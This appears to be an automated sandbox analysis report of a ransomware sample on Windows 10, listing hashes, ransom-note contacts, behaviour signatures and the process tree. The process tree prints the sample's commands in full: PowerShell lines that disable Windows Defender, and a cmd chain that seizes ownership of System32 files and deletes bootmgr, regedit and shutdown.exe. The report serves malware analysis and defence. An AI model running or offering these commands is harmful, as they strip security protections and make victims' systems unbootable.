Analysis
-
max time kernel
376s -
max time network
375s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
20-10-2021 09:26
Static task
static1
General
-
Target
b53415f6_lcvDB3iF4J.exe
-
Size
7.4MB
-
MD5
b53415f6d38ce4831cbf327daf5201b4
-
SHA1
778d6f976e10d201903c76adcd18f14e685a3704
-
SHA256
4efcc256493c1c7d8f695bee676beab4aaf3d3d1e1847cf8462c38af1107b7b8
-
SHA512
0c2e2fd8ebfe175dc844d64ad9e85f8ab23f8e63b75d7773a38bf68741071c0ea6aa91402b1ab5813a7d66b289650b1e868c56dd86636dcc26c37c07bdb55bb4
Malware Config
Extracted
C:\Users\Admin\Desktop\DECRYPT-FILES.TXT
CobraLocker@mail2tor.com
f64dfn9pbhybaqfrh5dp65jrzcg@protonmail.com
bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe
http://mail2tor2zyjdctd.onion/
Signatures
-
Maze
Ransomware family also known as ChaCha.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Disables Task Manager via registry modification
-
Executes dropped EXE 1 IoCs
Processes:
VSSVC.exepid process 3184 VSSVC.exe -
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
VSSVC.exedescription ioc process File renamed C:\Users\Admin\Pictures\ConfirmEdit.crw => C:\Users\Admin\Pictures\ConfirmEdit.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe VSSVC.exe -
Possible privilege escalation attempt 5 IoCs
Processes:
takeown.exeicacls.exetakeown.exetakeown.exeicacls.exepid process 2660 takeown.exe 4244 icacls.exe 1936 takeown.exe 2636 takeown.exe 296 icacls.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
b53415f6_lcvDB3iF4J.exeVSSVC.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b53415f6_lcvDB3iF4J.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b53415f6_lcvDB3iF4J.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion VSSVC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion VSSVC.exe -
Modifies file permissions 1 TTPs 5 IoCs
Processes:
icacls.exetakeown.exetakeown.exeicacls.exetakeown.exepid process 4244 icacls.exe 1936 takeown.exe 2636 takeown.exe 296 icacls.exe 2660 takeown.exe -
Processes:
resource yara_rule behavioral1/memory/3600-118-0x00000000009C0000-0x00000000009C1000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\VSSVC.exe themida C:\Users\Admin\AppData\Local\Temp\VSSVC.exe themida behavioral1/memory/3184-158-0x00000000008E0000-0x00000000008E1000-memory.dmp themida -
Processes:
VSSVC.exeb53415f6_lcvDB3iF4J.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA VSSVC.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA b53415f6_lcvDB3iF4J.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
b53415f6_lcvDB3iF4J.exeVSSVC.exepid process 3600 b53415f6_lcvDB3iF4J.exe 3184 VSSVC.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 1688 powershell.exe 4372 powershell.exe 4368 powershell.exe 4560 powershell.exe 1688 powershell.exe 4368 powershell.exe 4560 powershell.exe 4372 powershell.exe 1688 powershell.exe 4368 powershell.exe 4372 powershell.exe 4560 powershell.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
b53415f6_lcvDB3iF4J.exepowershell.exepowershell.exepowershell.exepowershell.exeVSSVC.exetakeown.exetakeown.exetakeown.exedescription pid process Token: SeDebugPrivilege 3600 b53415f6_lcvDB3iF4J.exe Token: SeDebugPrivilege 3600 b53415f6_lcvDB3iF4J.exe Token: SeDebugPrivilege 4560 powershell.exe Token: SeDebugPrivilege 1688 powershell.exe Token: SeDebugPrivilege 4372 powershell.exe Token: SeDebugPrivilege 4368 powershell.exe Token: SeDebugPrivilege 3184 VSSVC.exe Token: SeDebugPrivilege 3184 VSSVC.exe Token: SeTakeOwnershipPrivilege 2636 takeown.exe Token: SeTakeOwnershipPrivilege 2660 takeown.exe Token: SeTakeOwnershipPrivilege 1936 takeown.exe -
Suspicious use of WriteProcessMemory 33 IoCs
Processes:
b53415f6_lcvDB3iF4J.exeVSSVC.execmd.exedescription pid process target process PID 3600 wrote to memory of 4368 3600 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3600 wrote to memory of 4368 3600 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3600 wrote to memory of 4368 3600 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3600 wrote to memory of 4372 3600 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3600 wrote to memory of 4372 3600 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3600 wrote to memory of 4372 3600 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3600 wrote to memory of 1688 3600 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3600 wrote to memory of 1688 3600 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3600 wrote to memory of 1688 3600 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3600 wrote to memory of 4560 3600 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3600 wrote to memory of 4560 3600 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3600 wrote to memory of 4560 3600 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3600 wrote to memory of 3184 3600 b53415f6_lcvDB3iF4J.exe VSSVC.exe PID 3600 wrote to memory of 3184 3600 b53415f6_lcvDB3iF4J.exe VSSVC.exe PID 3600 wrote to memory of 3184 3600 b53415f6_lcvDB3iF4J.exe VSSVC.exe PID 3184 wrote to memory of 2340 3184 VSSVC.exe cmd.exe PID 3184 wrote to memory of 2340 3184 VSSVC.exe cmd.exe PID 3184 wrote to memory of 2340 3184 VSSVC.exe cmd.exe PID 2340 wrote to memory of 2636 2340 cmd.exe takeown.exe PID 2340 wrote to memory of 2636 2340 cmd.exe takeown.exe PID 2340 wrote to memory of 2636 2340 cmd.exe takeown.exe PID 2340 wrote to memory of 296 2340 cmd.exe icacls.exe PID 2340 wrote to memory of 296 2340 cmd.exe icacls.exe PID 2340 wrote to memory of 296 2340 cmd.exe icacls.exe PID 2340 wrote to memory of 2660 2340 cmd.exe takeown.exe PID 2340 wrote to memory of 2660 2340 cmd.exe takeown.exe PID 2340 wrote to memory of 2660 2340 cmd.exe takeown.exe PID 2340 wrote to memory of 4244 2340 cmd.exe icacls.exe PID 2340 wrote to memory of 4244 2340 cmd.exe icacls.exe PID 2340 wrote to memory of 4244 2340 cmd.exe icacls.exe PID 2340 wrote to memory of 1936 2340 cmd.exe takeown.exe PID 2340 wrote to memory of 1936 2340 cmd.exe takeown.exe PID 2340 wrote to memory of 1936 2340 cmd.exe takeown.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b53415f6_lcvDB3iF4J.exe"C:\Users\Admin\AppData\Local\Temp\b53415f6_lcvDB3iF4J.exe"1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent NeverSend2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disable2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"2⤵
- Executes dropped EXE
- Modifies extensions of user files
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && takeown /f C:\Windows\System32\shutdown.exe && icacls C:\Windows\System32\shutdown.exe /grant %username%:F && del C:\Windows\System32\shutdown.exe && Exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System324⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32 /grant Admin:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\drivers4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32\drivers /grant Admin:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\DECRYPT-FILES.TXT1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
6bf0e5945fb9da68e1b03bdaed5f6f8d
SHA1eed3802c8e4abe3b327c100c99c53d3bbcf8a33d
SHA256dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1
SHA512977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
7247129cd0644457905b7d6bf17fd078
SHA1dbf9139b5a1b72141f170d2eae911bbbe7e128c8
SHA256dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4
SHA5129b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
7247129cd0644457905b7d6bf17fd078
SHA1dbf9139b5a1b72141f170d2eae911bbbe7e128c8
SHA256dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4
SHA5129b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
7359845b8f7ea1b1c7fb055a96357b8f
SHA17a08f7d68dd36190face57e000b9c96632406699
SHA256bf54d74a8a201981317ba49617486a2595587e695f1f6aa2dc3600367201dd23
SHA512add50af15615a083265f4f9613eb422bc3a5f7e1cf73a87ab7e5f82a1a31af21a046dd6a34788c4538d350e05f7c3497fd110483ab92f4b3c8183dcbee41b44d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
3511ee1f148b3ad036bdeae0f387ed78
SHA11c271a2cafcfb51b0a1b7a772ef615bbb8b410cd
SHA256574af53e793f9ea124db211f78ec1f5a96e4d4b3c4a27b35340d5905d8dae90a
SHA51297eac4aeafc87863ff9b61356955735110f0a624e179899601ee00d1634dd58cc9910378d8f1c3c1c978bf1d16fd11a83f4d1702dd6730f16869ccf265600ec2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
3511ee1f148b3ad036bdeae0f387ed78
SHA11c271a2cafcfb51b0a1b7a772ef615bbb8b410cd
SHA256574af53e793f9ea124db211f78ec1f5a96e4d4b3c4a27b35340d5905d8dae90a
SHA51297eac4aeafc87863ff9b61356955735110f0a624e179899601ee00d1634dd58cc9910378d8f1c3c1c978bf1d16fd11a83f4d1702dd6730f16869ccf265600ec2
-
C:\Users\Admin\AppData\Local\Temp\VSSVC.exeMD5
e4f24d91d8e7290ffd6afc8aa01c6d63
SHA1b552c6af33cc5a62379028687924406cba8ff74d
SHA2565eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb
SHA512ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00
-
C:\Users\Admin\AppData\Local\Temp\VSSVC.exeMD5
e4f24d91d8e7290ffd6afc8aa01c6d63
SHA1b552c6af33cc5a62379028687924406cba8ff74d
SHA2565eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb
SHA512ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00
-
C:\Users\Admin\Desktop\DECRYPT-FILES.TXTMD5
8f6a1f1586c647b68aad35ce0f8dd416
SHA143a1727b987a2f66e7a9589c2ddac52030ca259b
SHA256452727c78872048a0a2a8ebd2c8ea1246f1c959c521cc7f45d99956a67c1325f
SHA51213bf3adbfd4deb3f60be04bf0fc87c56e483764e6806a072ec339cb48a080eab7d2f84439a0e2498f1c82231f8afae08de46253c79ee4ec3dcaec9c370e632ac
-
memory/296-915-0x0000000000000000-mapping.dmp
-
memory/1688-180-0x0000000007710000-0x0000000007711000-memory.dmpFilesize
4KB
-
memory/1688-126-0x0000000000000000-mapping.dmp
-
memory/1688-151-0x0000000006930000-0x0000000006931000-memory.dmpFilesize
4KB
-
memory/1688-128-0x0000000002BA0000-0x0000000002BA1000-memory.dmpFilesize
4KB
-
memory/1688-193-0x0000000002BA0000-0x0000000002BA1000-memory.dmpFilesize
4KB
-
memory/1688-131-0x0000000002BA0000-0x0000000002BA1000-memory.dmpFilesize
4KB
-
memory/1688-155-0x0000000006932000-0x0000000006933000-memory.dmpFilesize
4KB
-
memory/1688-291-0x0000000006933000-0x0000000006934000-memory.dmpFilesize
4KB
-
memory/1688-228-0x000000007F380000-0x000000007F381000-memory.dmpFilesize
4KB
-
memory/1936-918-0x0000000000000000-mapping.dmp
-
memory/2340-913-0x0000000000000000-mapping.dmp
-
memory/2636-914-0x0000000000000000-mapping.dmp
-
memory/2660-916-0x0000000000000000-mapping.dmp
-
memory/3184-158-0x00000000008E0000-0x00000000008E1000-memory.dmpFilesize
4KB
-
memory/3184-132-0x0000000000000000-mapping.dmp
-
memory/3184-154-0x0000000077CC0000-0x0000000077E4E000-memory.dmpFilesize
1.6MB
-
memory/3184-179-0x0000000005B40000-0x000000000603E000-memory.dmpFilesize
5.0MB
-
memory/3600-118-0x00000000009C0000-0x00000000009C1000-memory.dmpFilesize
4KB
-
memory/3600-120-0x00000000066E0000-0x00000000066E1000-memory.dmpFilesize
4KB
-
memory/3600-121-0x0000000006280000-0x0000000006281000-memory.dmpFilesize
4KB
-
memory/3600-122-0x00000000061E0000-0x00000000066DE000-memory.dmpFilesize
5.0MB
-
memory/3600-123-0x0000000006210000-0x0000000006211000-memory.dmpFilesize
4KB
-
memory/3600-115-0x0000000077CC0000-0x0000000077E4E000-memory.dmpFilesize
1.6MB
-
memory/4244-917-0x0000000000000000-mapping.dmp
-
memory/4368-187-0x0000000008A70000-0x0000000008A71000-memory.dmpFilesize
4KB
-
memory/4368-129-0x0000000004DC0000-0x0000000004DC1000-memory.dmpFilesize
4KB
-
memory/4368-124-0x0000000000000000-mapping.dmp
-
memory/4368-159-0x0000000007FD0000-0x0000000007FD1000-memory.dmpFilesize
4KB
-
memory/4368-139-0x0000000007280000-0x0000000007281000-memory.dmpFilesize
4KB
-
memory/4368-182-0x0000000008770000-0x0000000008771000-memory.dmpFilesize
4KB
-
memory/4368-287-0x0000000004EE3000-0x0000000004EE4000-memory.dmpFilesize
4KB
-
memory/4368-192-0x0000000004DC0000-0x0000000004DC1000-memory.dmpFilesize
4KB
-
memory/4368-144-0x00000000078F0000-0x00000000078F1000-memory.dmpFilesize
4KB
-
memory/4368-143-0x0000000004EE0000-0x0000000004EE1000-memory.dmpFilesize
4KB
-
memory/4368-130-0x0000000004DC0000-0x0000000004DC1000-memory.dmpFilesize
4KB
-
memory/4368-220-0x000000007EB70000-0x000000007EB71000-memory.dmpFilesize
4KB
-
memory/4368-147-0x0000000004EE2000-0x0000000004EE3000-memory.dmpFilesize
4KB
-
memory/4372-134-0x00000000044D0000-0x00000000044D1000-memory.dmpFilesize
4KB
-
memory/4372-150-0x0000000006B40000-0x0000000006B41000-memory.dmpFilesize
4KB
-
memory/4372-224-0x000000007EED0000-0x000000007EED1000-memory.dmpFilesize
4KB
-
memory/4372-125-0x0000000000000000-mapping.dmp
-
memory/4372-136-0x00000000044D0000-0x00000000044D1000-memory.dmpFilesize
4KB
-
memory/4372-194-0x00000000044D0000-0x00000000044D1000-memory.dmpFilesize
4KB
-
memory/4372-174-0x0000000007AF0000-0x0000000007AF1000-memory.dmpFilesize
4KB
-
memory/4372-168-0x00000000078A0000-0x00000000078A1000-memory.dmpFilesize
4KB
-
memory/4372-164-0x0000000007090000-0x0000000007091000-memory.dmpFilesize
4KB
-
memory/4372-284-0x0000000006B43000-0x0000000006B44000-memory.dmpFilesize
4KB
-
memory/4372-149-0x0000000006B42000-0x0000000006B43000-memory.dmpFilesize
4KB
-
memory/4560-153-0x0000000004392000-0x0000000004393000-memory.dmpFilesize
4KB
-
memory/4560-152-0x0000000004390000-0x0000000004391000-memory.dmpFilesize
4KB
-
memory/4560-133-0x0000000004130000-0x0000000004131000-memory.dmpFilesize
4KB
-
memory/4560-464-0x0000000004393000-0x0000000004394000-memory.dmpFilesize
4KB
-
memory/4560-135-0x0000000004130000-0x0000000004131000-memory.dmpFilesize
4KB
-
memory/4560-127-0x0000000000000000-mapping.dmp
-
memory/4560-198-0x0000000004130000-0x0000000004131000-memory.dmpFilesize
4KB